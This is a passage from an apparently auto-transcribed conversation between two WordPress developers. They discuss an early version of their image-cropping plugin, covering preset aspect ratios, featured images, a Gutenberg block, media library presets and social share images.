why image size and shape is important in the simplest possible terms.<br />Um, And then the other thing that just occurred to me is actually that, that you kind of alluded<br />[00:36:00] to is, uh, I don&#8217;t remember how you put it, but the, the idea of the sort of pre preset,<br />like, I&#8217;m, I&#8217;m way down, I&#8217;m close to the metal where I&#8217;m, I&#8217;m calling a preset, or when I say<br />preset, I&#8217;m saying preset aspect ratio.<br />But I, but you actually kind of alluded to, um, like a preset featured image or a preset something,<br />something, right? Mm-hmm. . Um, and I realized that like, again, what I&#8217;ve created I think is a<br />great, we&#8217;re still on version 0.0 0.3. Mm-hmm. , so I think it&#8217;s appropriate. Um, but, uh, uh, and<br />so, or what I&#8217;m say, sorry.</p>\n\n\n\n<p>Um, we have the crop. That is identical in three different places. Right? Featured image. And the<br />likelihood is your, what, what The assumption that we&#8217;re going under, which I think is, is pretty<br />safe, is [00:37:00] you always, once you get rolling, you always want your featured image to be<br />the same size and shape. Mm-hmm.<br />So that mm-hmm. , all of your posts look consistent. Mm-hmm. . And the same might go for,<br />might not go for in, in post images, cuz you might want a smaller one shifted, left or shifted right.<br />You might want an infographic that&#8217;s tall and so you don&#8217;t necessarily want to be confined, but<br />here are some, some presets that, you know, look we like, you know, getting a level deeper with<br />design is you often want.<br />Your images to be similar throughout a website, the same way you want fonts to be. Similar<br />throughout a website, you want colors to be similar without throughout a website. So, you know,<br />in a perfect world, not that you shouldn&#8217;t sometimes break the rules, but you often want, if your<br />featured images are all 16, nine, you know, [00:38:00] design a a design guideline might<br />encourage you to have 16, nine images elsewhere.<br />That&#8217;s a little digression, but I think that&#8217;s true. And then taking this even further, if you go to the<br />media library, uh, again, right now for the sake of simplicity, I&#8217;ve got the same settings and the<br />same UI applied to the media library, upload a 16 nine image. But here I actually see, uh, a<br />different, or I&#8217;m envisioning a different UI that says, Upload a featured image, which uses the<br />settings from the featured images.<br />But we could also include things like upload an image for Twitter, upload a, you know, and this is<br />where a preset comes in, right? Upload, you know, a circles a circle, but upload a, and this is, I<br />think what, going back to, uh, the, [00:39:00] the little, um, sticker mule menu that we were<br />talking about where there&#8217;s sort of these predefined touchpoints.<br />And so, yeah, so it&#8217;s like you&#8217;re, you&#8217;re in a post, you&#8217;re writing a post. And we also, I think we<br />are spending a lot of time, we are being very word pressy. Um, and it might be to our detriment,<br />um, we are assuming anybody is actually writing a post. And I even saw a headline I think this<br />morning that was like, should WordPress get rid of the blog?<br />You know, it started as a blog, but should we, should it actually get rid of the blog focus<br />altogether? Because most people are using it as a C M S and building pages more than posts.<br />Mm-hmm. is, is the, was the hypothesis. But anyway, uh, you know, feature image images still<br />applies to pages. Um, when you&#8217;re writing a page, you know, we say in post [00:40:00] image,<br />but an in, in page image, so we&#8217;re not thinking wrong.<br />But, you know, thinking of WordPress as a c m s, you&#8217;re like, you build a page, but then you also<br />need an image for two, an OG image, open graph image for social, you might want to da da da<br />da da. And this is where we were talking about, you know, what, what you really need is an<br />image crop so that no image gets uploaded to WordPress incorrectly.<br />Mm-hmm. , right? And that&#8217;s where, uh, I, I&#8217;m, you know, again, I, we&#8217;ve sort of talked about it<br />and you kind of alluded to it a minute ago as like, within at least media library to have a, you<br />know, what kind of image do you want to upload an image for Twitter? Okay, well that needs to<br />be this size, the shape. I wanna upload a header for Facebook.<br />Or, you know, it&#8217;s like, I mean, these are bad examples cuz you&#8217;d upload those to Twitter or<br />[00:41:00] to Facebook. Um, but it could also be, uh, you know, it doesn&#8217;t even necessarily get<br />up, get saved to your media library, crop in image for Twitter. Download it and now, now post it<br />to Twitter. Crop an image for Facebook.<br />Now post it to Facebook. Do you wanna also save this in your media library?<br />and that&#8217;s where we kind of end up taking over. You know, it&#8217;s like media library bec, you know,<br />becomes, uh, Photoshop within WordPress. Okay. Now that&#8217;s interesting. Um,<br />what kind of image do you want to create today?<br />Cory Miller: You said something that was really interesting to me, um, that stuck out and it&#8217;s like<br />the c m s conversation. Hmm. Is it just the c m s or, you know, [00:42:00] do we, so I was trying<br />to find this blog site to see how they did it, but you go like, but there are people that still use<br />publishing their WordPress is their publishing tool.<br />Um, and I think of that like your client&#8217;s content journey clients mm-hmm. and. They&#8217;re using the<br />blog side. And I go, that was a helpful distinguishing for me is like if you just using the c m s, our<br />image is gonna be static. For instance, most cases, like you&#8217;re not gonna do a lot of image<br />manipulation.</p>\n\n\n\n<p>You may in turn, uh, initially, but we&#8217;re turning over to people that are pushing the publish button.<br />Like you have a newspaper or a magazine client, for instance. They are like, they&#8217;re in the<br />business of publishing. Yeah. Steady content. And that just made me think about the use case<br />again, is I still think the settings [00:43:00] conversation is great because a lot of these people<br />are gonna have agencies build the site because they.<br />To do the publishing really fast. So we&#8217;ve given those tools to the setting, they&#8217;ll look over here.<br />It&#8217;s like I went to moz.com just to see how they use damages. Oh, sure. I went to HubSpot, like<br />the bakery site. Oh, HubSpot. Yeah.<br />Corey Maass: Since they&#8217;re big on SEO and, but I bet. But they do a lot of content.<br />Cory Miller: They&#8217;re publishers, um mm-hmm.<br />which is really interesting. That aligns with where WordPress is, you know? Yeah. Okay. Let me<br />find, try to find,<br />I, I think this is important. This isn&#8217;t wasted because it&#8217;s, um, we&#8217;re drilling down closer to<br />really crystallizing who, yeah. Who, who, yeah. Okay, so [00:44:00] lemme just go back. Okay.<br />So they&#8217;re obviously using, this is probably, Well, hope has their own thing, but like they&#8217;re using<br />some image to draw some interest to the,<br />Corey Maass: so up top you&#8217;ve got four, three. I&#8217;m just, I&#8217;m gonna keep nerding out about this<br />cuz it&#8217;s like, this is what people aren&#8217;t seeing.<br />They&#8217;re, they&#8217;re seeing but not absorbing right? Is Right. On that previous page, you had four,<br />three images and square images, and then you drill, drill down and what would be, you know, a<br />primary image at the top again after the paragraph? Looks like it&#8217;s about four three. But it, but I,<br />I, I liked your WP beginner example.<br />Same with HubSpot, is that they&#8217;re just, they&#8217;re just, they&#8217;re essentially just putting images in line<br />and just like a magazine. So you&#8217;re reading a magazine and they might have a big pretty<br />picture, but they&#8217;re, um, you know, throughout an article they&#8217;ll have [00:45:00] photos.<br />So like,<br />Cory Miller: huh, good<br />Corey Maass: God. Okay. I go to like rolling stone.com.<br />Like go to a publisher. That&#8217;s interesting. Whoops. Yeah,<br />so those look like four, three images and then some square images. Just scroll down a little<br />interesting that this layout is almost identical to, um, Huffington Post , or not Huffington Post, uh,<br />the Atlantic. If you go to the Atlantic , it&#8217;s almost identical. Um, but anyway, there&#8217;s another<br />example. So [00:46:00] like we get into actual news sites, so they&#8217;ve got those look closer to like<br />16, nine.<br />Um, yeah, go back to Rolling Stone. I don&#8217;t need to see Huffington Post homepage. That&#8217;s too<br />depressing. . Um, but click, click into, click into any one of these stories. And here&#8217;s a pretty<br />typical layout. You know, there&#8217;s that featured image again, and then the story below it, and<br />then, but I bet they have images within, I guess this one&#8217;s just a short story, but anyway.<br />Yeah. You think this is four 30? It looks pretty close. I mean, I&#8217;m eyeballing it. Yeah. But,<br />but also, but I guess close enough that if somebody who isn&#8217;t rolling Stone wanted to create<br />their own website, they&#8217;d be like, okay, every time I in. Insert an image into a story, [00:47:00] I<br />will use the four three. Like we, so we, you know what, what, I guess I never finished the<br />description of the, the new version is we have settings and we also now have a block, a<br />Gutenberg block.<br />Yeah.<br />Cory Miller: By the way, you snuck that in on me.<br />Corey Maass: Yeah. So, so we now have, we&#8217;re, we&#8217;re, we&#8217;re pretty close to like feature<br />complete, right? So we have fe you can crop a featured image, you can crop, um, a Gutenberg<br />block and you can crop images going into the media library. Um, and so I think, you know,<br />again, I, uh, I th we&#8217;re focusing a lot on settings, but I think that there&#8217;s a good chance that most<br />people, your average person, will never need to go to those settings.<br />The likelihood is that most will, uh, so I called it cropped image because I think most people are<br />gonna look for image. So it says, select, select an image to crop, and then here&#8217;s our presets.<br />And so I think what most people are gonna do is [00:48:00] they&#8217;re like, they will decide, they will<br />choose four, three, and then, and then every time they do this again, they will choose four three.</p>\n\n\n\n<p>Like, that&#8217;s how most people use these kinds of tools. Like they, they do something once or they<br />learn, click, click, click. They don&#8217;t necessarily think about optimizing their clicking, and so they&#8217;ll<br />just choose four, three every time. If it looks good, the first.<br />Cory Miller: So question about the four three. So we&#8217;ve just said this is probably one of the four,<br />three and 16 by nine, you already know this, but four three was a lot on these sites and that<br />typically, like I&#8217;d look at beginner and all these others, and I go, it&#8217;s four three, like in the, in the<br />vicinity, right?<br />So how did you determine what this with is?<br />Corey Maass: Uh, so that is what&#8217;s set by the, on the settings page. I&#8217;m not saying go there, but<br />there are, [00:49:00] um, some common sense defaults. So it&#8217;s at least a thousand wide and it&#8217;s<br />less than 2000 wide. So if you tried to upload something that was off of your phone, high res,<br />you know, 8,000 wide, it would bring it down to 2000 or something.<br />But you also, if you tried to upload just an emoji, it would make it. Bigger, unless you said<br />bypass.<br />Cory Miller: I see. Okay. So the rationale, so we&#8217;re picking four, three, and then we&#8217;ve got these<br />bigger bumpers. So like this mm-hmm. , if we, so this image is actually whatever the settings</p>\n\n\n\n<p>are a thousand wide. So it&#8217;s technically bigger than it needs to be because of the settings. Mm-<br />hmm. . But that probably has advantages, I&#8217;m guessing, [00:50:00] for.</p>\n\n\n\n<p>Corey Maass: For and for responsive. Like, I&#8217;ve actually built sites before that. So, you know,<br />when you think about responsive and I, I know I&#8217;m devving out here, but, um, no, go for it.<br />You&#8217;ve generally responsive. You&#8217;re thinking mobile phone, you&#8217;re thinking tablet, and you&#8217;re<br />thinking desktop. Right. And uh, I&#8217;ve actually seen sites where, uh, on desktop we had multiple<br />columns of content.<br />So the images were a third of the total width of the site, which, which didn&#8217;t go edge to edge on<br />the screen. So an image was never more than like 800 wide. But then if you looked at it on<br />tablet, it, it went to a one column view images over text and, and not multiple columns of<br />content. And so suddenly it was 10,000 or it was a thousand wide, uh, or, you know, [00:51:00]<br />the size of my iPad here with right.<br />And so it actually went wider on mobile. And so a lot of people will be messing around building<br />their website on their desktop computer or on their laptop, and then eventually they&#8217;ll look at<br />their phone or they&#8217;ll look at their tablet, um, to do, to test it, and the images will actually go<br />wider. Um, and so it&#8217;s not a bad thing to have an image that&#8217;s, again, it&#8217;s if it&#8217;s compressed,<br />which is a whole different conversation.<br />Um, and not, if it&#8217;s not four megs and 8,000 pixels wide, it&#8217;s okay. That. A little too big cuz<br />browsers will size things down. Um, and better that than then it&#8217;s the, then it&#8217;s 800 and gets<br />upsized to be 1200. Cuz that&#8217;s when it looks bad.<br />Cory Miller: Gotcha. Okay. I&#8217;m, I&#8217;m much more understanding this now and it makes [00:52:00]<br />sense, um, because it&#8217;s okay to have like a thousand, whatever the default settings are Yeah.<br />Because you&#8217;ve got these benefits, but it&#8217;s not like an 18 meg file. Exactly. You know? Exactly.<br />But it, it&#8217;s, it&#8217;s in the window of like being quality image and you can set those differently if you<br />want.<br />Like in the setting. Yeah. So that&#8217;s, that&#8217;s great there. Yeah. Um, I gotta tell you, I think right here<br />you&#8217;ve nailed it. , like we&#8217;ve got the Gutenberg block. Mm-hmm. . All right, magician, how&#8217;d you,<br />how&#8217;d you get this done? Have you been working on this ? I think you told me you were gonna<br />work.<br />Corey Maass: No, no, no, no. We, so we, you know, early days when you and I first started<br />talking about this, um, I hired a couple of different developers, one who helped me out with<br />featured image and one who helped me out with block.<br />Um, and they got me [00:53:00] pretty close to the block working, but I couldn&#8217;t, I hadn&#8217;t<br />wrapped my head around. Uh, everything else that I&#8217;ve subsequently wrapped my head around<br />by building it for featured images and building it for media library. So then when I went back and<br />looked at, uh, what he did for the block, I was like, I literally copied the code from Featured<br />Image.<br />And so it took 45 minutes or something because he had already done the, the tricky part. And I,<br />again, have learned a lot more in the interim time. So, uh, so yeah, it was, it was, uh, too big of<br />a lift early on, but coming back to it, it was almost easy. So, yeah. Um, for me, I want to. See if<br />[00:54:00] I can, cuz again, I, I&#8217;m using, um, the classic editor.</p>\n\n\n\n<p>I wanna see if I can overwrite the featured image for that. And then we&#8217;re pretty close to, um, I<br />guess we need the media, like if you click on the add, add image button, you know, in the<br />classic text editor, um, you know, there&#8217;s a couple of, of little things, but they&#8217;re not, they&#8217;re not<br />insignificant, but they are not like modern WordPress.<br />So we&#8217;re, we&#8217;re in pretty good shape. But yeah, I, I definitely would love your input. Like things<br />like, don&#8217;t call them presets, call them preset aspect ratio. Mm-hmm. , um, um, and start thinking<br />about the, you know, the happy text, the explanation text, the, um, do you upload one of your<br />broken images again? Yeah.<br />um, You know, and, and docs and, and welcome text. [00:55:00] And, and if we start talking<br />about, um, a little video for, um, you know, to put on that welcome screen, like that&#8217;s, that&#8217;s<br />where we&#8217;re at. Like starting to actually make this, uh, friendlier and, and more clear. I like your<br />guy.<br />Cory Miller: Okay, now I was just playing with that. Yep.<br />That&#8217;s awesome man. I think this is a game changer. I think this right here could be the v1, like<br />in this, you know, that&#8217;s where we started from a long time ago. We just weren&#8217;t there. We<br />needed some time and space to like be able in opportunity obviously to do this, but like that right<br />there. Hits my original.<br />Holy crap. Can we have this? Can I have this? Mm-hmm. , I want this thing [00:56:00] because<br />Yeah. That&#8217;s super cool. But now some more, I, I heard what you were sayings like more all text.<br />If, if I, if I may though. So is the, em the image is cropped right here. Mm-hmm. . But there&#8217;s<br />white space. So is this the block takes up the whole thing.<br />So we, we would, we can&#8217;t do like Right. Justified or something like that.<br />Corey Maass: What? Right. These are things we need to, to work on. Okay. Add, yeah. These<br />are, and I, and the truth is, is, is I need more real world usage. Mm-hmm. and people telling me<br />what they need for me to know what to add. Okay. I mean, the, I think, you know, the, the easy<br />analogy is if you go at a regular image block,<br />Good luck figuring it out, cuz Gutenberg is confusing [00:57:00] as heck. Not that I&#8217;m cynical.<br />Um, but you&#8217;ve already got, uh, yeah, alignment. Um, what&#8217;s the little triangle next to it?<br />Oh, those filters. Mm-hmm. . So there&#8217;s, you know, like that&#8217;s where, you know, if people are<br />using them, if they want them, we can start adding stuff like that. And this is where, what we&#8217;ve<br />talked about, like we can, you know, we can start messing around with other stuff if, if people<br />want them, um, people need them.<br />You know, we&#8217;re, we&#8217;re still currently at version 0 0 3, so,<br />Cory Miller: okay man, you can get lost in these settings. They&#8217;ve added a lot of the settings it<br />seems. . Mm-hmm. . So would we be able to take, I think somewhere along the way, you<br />mentioned you [00:58:00] looked at a current block and saw some opportunities here, but would<br />these, taking this block with some of these things like the filter, um, would be, we&#8217;d be able to<br />hook into that.<br />I mean essentially like fork? Fork.<br />Corey Maass: Yeah, I think so. I think so. Or ex extend it basically.<br />Yeah. See there&#8217;s your aspect ratios.<br />Cory Miller: This must have got a big update or I&#8217;ve never looked at it.<br />Corey Maass: Yeah.<br />And you know, and part of why it was, I loved your idea of. Doubling down on featured images is<br />none of these are available and, and are not at, at least as far as I know and are not available in<br />media library.[00:59:00]<br />But, so maybe we should do a session where we like, walk through these and, um, yeah. Begin<br />further. Seriously.<br />Wow.<br />Cory Miller: Okay.<br />That&#8217;s, yeah. We de I, I, I for sure need to do this because I had no<br />Corey Maass: idea.<br />People at watching are gonna be like, uh, yeah, it&#8217;s been there for six weeks.<br />Cory Miller: Now that, oh, you have to upload the image first. Okay. Or you have to get the<br />image.<br />Corey Maass: Sorry. Yeah. I think, I think especially, I especially think the alignment [01:00:00]<br />stuff, because that, that to me is version one, right? Like, you need an image, you need the</p>\n\n\n\n<p>image to behave the way you want. Yeah. Shift left, shift right. Whatever. Um, and then getting<br />into this kind of stuff is, is gravy and is a rabbit hole.<br />Oh yeah. Like, you know, we can start again. I, I, I like that we set up a request for feedback.<br />Um, It would be nice if we started getting people using it cuz then they&#8217;d be like, oh, the default<br />block has such and such. Three, two, why don&#8217;t you have three, two, and go, okay, so let&#8217;s go<br />add three, two as a default preset aspect ratio.<br />And you know, or hey, we, you know, why doesn&#8217;t the image shift left sh you know, uh, or why<br />can&#8217;t I set widths? Okay, great. We&#8217;ll go add that. Mm-hmm. . [01:01:00]<br />Cory Miller: Okay. Maybe I need to play with that a little bit more. Um, yeah. Now, but standing<br />now you don&#8217;t wanna like best, uh, that we don&#8217;t have at the moment, but alignment, we&#8217;ve<br />already talked about that.<br />Having that, that&#8217;s, that&#8217;s pretty cool. Cause you can go over here. Right, exactly. You know, all<br />that stuff. This is incredibly compelling to me. Um, because it&#8217;s kind of your way like. You know<br />how themes do this with your color settings. Mm-hmm. , but having some, I don&#8217;t, this is just a,<br />this is a pretty cool way to Dr.<br />Like, this is just this boring image just done with a little filter. Mm-hmm. , or they call these filters,<br />duotone filters. Yep. The filters are really interesting to me because you can make it like, it&#8217;s not<br />gonna be just another stock. Yours. Yeah. You kinda make it yours. Um, but I think now with the<br />Gutenberg plug, man, that&#8217;s the, [01:02:00] that&#8217;s the feature.<br />Um, I could get us to more installs. Um,<br />Corey Maass: I agree. Um, I don&#8217;t, I don&#8217;t know that I&#8217;d, I&#8217;d be curious why that&#8217;s not the right<br />word. How the core team and, you know, 500 volunteers, et cetera, landed on Duotone. Um,<br />mm-hmm. rather than something else, because it&#8217;s, you know, WordPress is at the whim of the<br />people who, who are involved.<br />So it&#8217;s like, did they ask for this? Did they want this? You know, did somebody like me come<br />along and go, oh, this is a neat thing, let&#8217;s add it. And everybody was like, yeah, it&#8217;s cool. We&#8217;ll<br />add it, you know, or people using it. I, which is, and that&#8217;s of course the black box, black box part<br />of WordPress is [01:03:00] we will never have any idea whether people are actually using<br />Duotone filters, um, et cetera.<br />I know that&#8217;s a bit of a cynical approach, but it&#8217;s like, I want to, I wanna make sure that we are<br />focused on. We want our own bumpers because it&#8217;s, you know, this is, this is the slippery slope<br />that I often fall into. It&#8217;s like, I trusted my gut when you were like, I need a circle. And I was like,<br />yeah, we need a circle.<br />But I don&#8217;t, my gut doesn&#8217;t jump when, when we say duotone filters unless, yeah. You know, but<br />unless we have compelling evidence that people are using them.<br />Cory Miller: Yeah. Well I think though the, the single po single block, the, the, the crop to image<br />block could be really that ticker for, uh, um, getting those active installs.<br />Um, and now we [01:04:00] need to switch to, I wanted to make sure we talked to that side<br />because, uh, you surprised me with it. I saw it in there and I was waiting. I was like, no, let him<br />talk about the settings. You&#8217;re like, go. Featured image or whatever, and I was like, I really want<br />to click on GI Berg Block by White<br />Corey Maass: Um, well, and that&#8217;s, I really, yeah. Uh, the block I think will evolve unto itself. It&#8217;ll<br />have those settings, right? Because your, your media library, even your featured image doesn&#8217;t<br />have left or right. A line, like that&#8217;s up to your theme, how it&#8217;s being used. Um, so, so the block<br />will start to evolve with additional settings.<br />Whatev, and we did, again, my gut jumps. Yes, we need alignment for sure. Um, you pointed out<br />yourself, you&#8217;re like, I uploaded a Lego man and he&#8217;s always aligned, left, like, that&#8217;s useless. So<br />immediately we need those, we need alignment. Um, and then I also want to start [01:05:00]<br />evolving the idea of, again, media library presets, meaning, you know, what kind of image do<br />you want to upload?<br />And, and again, and I, I start to get really excited about the idea of images that aren&#8217;t even<br />stored in the library. You&#8217;re going to, like media library implies, or we are taught by WordPress<br />that this is where we store images for WordPress. But why isn&#8217;t it just called media? And why<br />isn&#8217;t a place where you can go and edit an image and download it and it, and it has nothing to<br />do with WordPress.<br />And that&#8217;s exactly the, the sticker mule conversation we had. Mm-hmm. like utility, go to media.<br />Yeah. It&#8217;s a utility to go to media. And it&#8217;s not a media library or it&#8217;s not just a media library. It&#8217;s a</p>\n\n\n\n<p>place where, you know, you can edit an image and then download it. So it&#8217;s like, yo, you just<br />created a post for.[01:06:00]<br />You know, a new post about the brownies, the brownies images image is already in there. Now<br />you need to create an image for Twitter, you need to create an image for Facebook, you need to<br />create a square image for Instagram. So jump into media, grab that image that&#8217;s already in the<br />media library, edited a bunch of times, maybe put a title over it.<br />Download the result. Again, doesn&#8217;t get uploaded to Media Library necessarily. And then now<br />you go over to your socials, or go into Buffer or whatever tool you use for scheduling your, you</p>\n\n\n\n<p>know, multi broadcast to all of your socials and upload the appropriate image for each one. Mm-<br />hmm. . And that also diverges us from Word.</p>\n\n\n\n<p>which I think is important, especially now seeing the default image. Like you said, I didn&#8217;t realize<br />half that stuff was in there. And so we are starting to overlap with them, [01:07:00] which I don&#8217;t<br />want to do. Like, what&#8217;s the point? If it&#8217;s built into core. I mean their, our original thesis was<br />within media library image cropping is awful and I&#8217;ve maintained that.<br />It still is. But if you can crop an image as quick as we can inside of a block, then, then maybe we<br />don&#8217;t need a block. What&#8217;s our differentiator there? But image manipulation elsewhere within<br />WordPress. Like right now, I would absolutely argue that our featured image handler is better<br />than the defaults.<br />And same with media library still. Mm-hmm. . Cause that, that&#8217;s that original crop. That&#8217;s awful.<br />So these are the things that we need to, to balance. Yeah. I,<br />Cory Miller: I mean, I still think the image blocking burg, the, the crop tool is just, I don&#8217;t, I don&#8217;t<br />even know how to use it. Right. [01:08:00] Um,<br />Corey Maass: yeah, yeah. I&#8217;m not, I&#8217;m not necessarily saying we, we rip, you know, I&#8217;m not<br />gonna go rip it out in version 0 0 4.<br />Mm-hmm. , but I don&#8217;t wanna, we don&#8217;t need to recreate that, which WordPress already does.<br />That&#8217;s silly. Yeah. Um, because, and, and I mean, to be like, there, there are plugins out there<br />that do core features better, and we can still do that. But that, that&#8217;s, that, uh, the me, the margin<br />is thin. The, the margin of value that we add is thin if the features are already there, whereas not<br />jumping over, having.<br />Create a post, a story, a page in WordPress, and then jump over to Canva to create your social<br />images. To me, the margin of value add is much larger. Mm-hmm. . So,<br />Cory Miller: yeah. I, I was just trying [01:09:00] to think about, you know, you look at,<br />you look at, like some of the sites we just looked at and you go, there&#8217;s a formula here for how<br />to create a good image. And<br />I would think like, like showing w beginner, for instance, they&#8217;re gonna need Camba or some<br />photo editing, graphic design software. Um, but there&#8217;s this case potentially for the output you<br />want is something like, like I just went to Medium for a second. And was kinda looking at a<br />couple of the articles.<br />Cause I go, you know, high readability, beautiful design, um, very standard. And, you know, I&#8217;m<br />looking at all these posts here and they all have, you know, an image and we know, we know it<br />would be better if you had the image. [01:10:00] Um, my, so I&#8217;m just kind of keeping thinking<br />about what&#8217;s the three value proposition, what&#8217;s the paid value proposition on this?<br />Mm-hmm. and what&#8217;s our space for this? Um, but I do think, like, here, here&#8217;s the, here&#8217;s one<br />part. There&#8217;s all, there&#8217;s this image block within Gate Burke and you go a lot of stuff, a lot of<br />people have thought through those things. A lot of options. Most people won&#8217;t even touch &#8217;em.<br />Mm-hmm. , you know, um, just, most people won&#8217;t touch &#8217;em because it&#8217;s too deep of tools.<br />But what, what are you really wanting? , you want a post that looks nice? Mm-hmm. like<br />attractive and the images help supplement the story. Mm-hmm. . Um, so I&#8217;m just kind of think<br />there with our angle, like we&#8217;re here and just kind of continuing to look at where, what&#8217;s our<br />angle for all this? Until we, until we kind of go, okay.<br />I think this is it. [01:11:00] Like we knew the agency settings case, we got that, we got the block,<br />then we discovered this other thing. And um, I just keep trying to think through like, if we can get<br />enough of a pattern of people that have this, have a problem, we can, it&#8217;ll really help us<br />crystallize the all this stuff.<br />Because you continually say, this is what I love working with awesome developers. We could do<br />that. Oh, by the way, I already did it. Here it is. And um, now we&#8217;ve got enough ingredients I<br />think. We need to nail that use case where, right.</p>\n\n\n\n<p>Corey Maass: Yeah. We&#8217;ve got, we&#8217;ve got screwdrivers, we&#8217;ve got a hammer, we&#8217;ve, we&#8217;ve now<br />got the tool belt.<br />What the hell are we gonna build? Literally<br />Cory Miller: any, yeah, exactly. We need a person. I wrote this down as you were talking. I was<br />like, we need a person, you know, the, the, [01:12:00] the user in client, whatever that is, and<br />whether they want it, you go, I want it to speed it up, what I&#8217;m trying to do. Mm-hmm. Like if we<br />just looked at, because for the publishing conversation, you&#8217;re like, what do you really need?<br />You need to be able to get your content. You&#8217;re gonna do the text. That&#8217;s your thing when you&#8217;re<br />looking for the images. You want something that kind of fits a formula, like the WP beginner<br />formula medium, Moz, I looked at Moz, the bakery site. You&#8217;re like, that&#8217;s a, that&#8217;s a formula, a<br />pattern for how to do content.<br />So, mm-hmm. , some of this comes into the finding, but like I go, like that duotone use case, I&#8217;d<br />go, why not make every image of Duotone? It&#8217;s just something different. You know what I mean?<br />Like it&#8217;s something unique. So I might think through, and where I go back to my past is I like to<br />use templates for those things.<br />Mm-hmm. . [01:13:00] So I&#8217;m trying to keep that in mind for our product or what we&#8217;re doing is<br />the outcome they&#8217;re trying to get is really something that, like you look on medium and you go,<br />some people don&#8217;t. By and large, this just really works. It looks like a clean site. The images are<br />plusing, the value of the content, which I don&#8217;t ever do.<br />Um, We talked about the four threes, like that seems the standard in a lot of these posts. So I&#8217;m<br />really thinking for that user, the publisher user, um, and trying to build that case for the product<br />of what we&#8217;re doing. Um, mm-hmm. , because like I, I think about the filters and I go, um, I told<br />you, we, we talked about my cartoon app,<br />I&#8217;m like, now the problem when I write content is I don&#8217;t have an image in mind. Mm. So finding<br />an image is pain the butt, like, let&#8217;s put down, we have discovered a [01:14:00] problem. It is<br />finding, creating sourcing images that are good is a big problem. We haven&#8217;t, we haven&#8217;t, we&#8217;ve<br />just identified it&#8217;s just a problem.<br />We&#8217;re over here. Um, but like I go, if we had, it&#8217;s like Instagram. I can take, okay. I&#8217;ve got a<br />camera in my pocket, carry with me all the time. My iPhone, it lets me take pictures. What did<br />Instagram did? Make them look a little better. Mm-hmm. , you know, just a little bit better. And<br />that&#8217;s, that&#8217;s something in this where I think that this is what pulls me back to the duo turn thing,<br />is it doesn&#8217;t have to be due to, it&#8217;s just the, a aspect of Sure.<br />You know, how do I look like it&#8217;s not stock<br />Corey Maass: or Well, and that&#8217;s, it&#8217;s not, I mean, that&#8217;s why AI is, is going running rampant, is<br />that people are like, I can now generate original art without paying for it, or paying nominally for<br />[01:15:00] it that nobody else has over and over and over again. Yeah. And that&#8217;s why people<br />are over the moon.<br />You know, obviously there&#8217;s no substitute for hiring a photographer to take pictures of products,<br />people, things like that. But if you need a. Abstract picture to just kind of add that compelling<br />human visual element. You&#8217;re like, generate a picture of I&#8217;m writing a post about coffee, so<br />generate a picture of a guy on a horse drinking a cup of coffee, you know, I don&#8217;t have to spend<br />hours.<br />The, the image will come to me and it&#8217;ll be unique and literally nobody else will have that.<br />Whereas, you know, the sites like stock, whatever, the stock photo, stock image sites historically<br />would charge you more. You could go buy an image, you could pay, you know, a thousand times<br />more for them to take it off the site to guarantee that nobody else ever used it again.<br />[01:16:00] Right. Um, that&#8217;s not a, that&#8217;s not gonna be an issue for much longer, you know?<br />Cory Miller: Um, it&#8217;s not Will it? Okay. So something you said, I wrote down here, I was like,<br />nobody else has it. See. Like we, we are looking at the, I&#8217;m gonna share my screen again. Do<br />you have a second to keep talking about<br />Corey Maass: this? Yeah, let&#8217;s<br />Cory Miller: go 10 more minutes.<br />Um, okay, so Rolling Stone. I don&#8217;t have a, the Desi design ability, I don&#8217;t have the resources to<br />create this, this thing now with ai, is there that opportunity That&#8217;s mm-hmm. . That&#8217;s, that&#8217;s really<br />interesting. But that&#8217;s a sidebar. Yep. But like, you think about this now, for now, when I look at<br />this site, I go, this is thoughtful.</p>\n\n\n\n<p>Like this is unique. It&#8217;s interesting. Like this, Ima I didn&#8217;t even read what this is, but I [01:17:00]<br />was like, it it fits, you know, the, the case and cuz what you&#8217;re trying to, I&#8217;m sorry, I&#8217;m just trying<br />to keep talking about the use case. Here is what you&#8217;re trying to get is. , you know, back to<br />beginner, like, hey, nice sight, nice clean, clear side design.<br />They&#8217;re trying to get you to the content. So they&#8217;re doing a great job with SEO here with the<br />intro, restating what the headline&#8217;s about. Then they use the image, which I think is clever. Like,<br />I don&#8217;t like the featured image going outside of the post because it just fills out a whack for me.<br />But I&#8217;m like, this is interesting.<br />They have given an image that probably, you know, uh, this has SEO in it, you know? Mm-hmm.<br />, I, I, I would guess, look at this. They&#8217;ve restated, they&#8217;ve restated again, the headline.<br />Corey Maass: Yeah. Well, and that&#8217;s that also, that image is [01:18:00] gonna be, um, usable<br />for social. Right. If picture that as a, as a Facebook post it, it says their headline right int it.<br />Cory Miller: Okay, now, now, now you got got me something here. Okay. So may not go<br />anywhere, but the social share side, you&#8217;ve done all of this work to create some kind of content<br />and that social share, like our stuff from post status. I hate it because it&#8217;s not something we don&#8217;t<br />have set up. Right? You know? But what you want is, I&#8217;ve just done this cool post here that<br />hopefully is of interest to you and you&#8217;re using the image in social to pull somebody into it.<br />It&#8217;s kinda like this, almost like this. Well, or who is the<br />Freemius or are they, there [01:19:00] you go. Like if you look at this from a social Sears<br />standpoint, it&#8217;s probably more interesting. Visually, you can kind of say, I see Covid and I see<br />some kinda like weird things around it. Mm-hmm. , right? But I go, it&#8217;s something to do with<br />Covid, like from a social share. That&#8217;s pretty good.<br />Like that&#8217;s what you&#8217;d want represented out on social is it&#8217;s uh, it&#8217;s the product packaging to say,<br />there&#8217;s something in here I want and to go get it. We talked a little bit about that yo side, but<br />man, all of that social sharing stuff is just a mess. Like when I post my, I should do it here when I<br />post my, let me show you something.<br />If you have a second. If I go into to Slack and I&#8217;m gonna, then I&#8217;m gonna try to share this so you<br />can see it. Okay. Maybe this has [01:20:00] been fixed, but this thing right.<br />This, this little snippet that&#8217;s now fixed. I don&#8217;t, oh, it&#8217;s cuz I clicked the social share stuff. But<br />see, like when you do<br />any day now<br />Okay. Anyway, it doesn&#8217;t look good. Like it&#8217;s, it&#8217;s not, there we go. Yeah, sure. Okay. So<br />somehow this, this has attached to the homepage, right? But the idea that you want is, it<br />represents that f. Social share, whatever the image thing, whatever we titled it, feature name or<br />whatever it is, like that, whatever [01:21:00] this, I don&#8217;t know if it&#8217;s graphical or whatever it&#8217;s<br />called.<br />But, um, what you&#8217;re trying to do when you post that to social is show this effect of what, like, w<br />if you beginner on different things, designs, like here&#8217;s something to show you see, show you<br />what this post is about. That&#8217;s an interesting angle, but I, I don&#8217;t know where it goes from here,<br />but like,<br />Corey Maass: so like here&#8217;s, here&#8217;s a tool that I&#8217;ve been playing around with lately is, uh, so<br />Twitter has introduced cards the 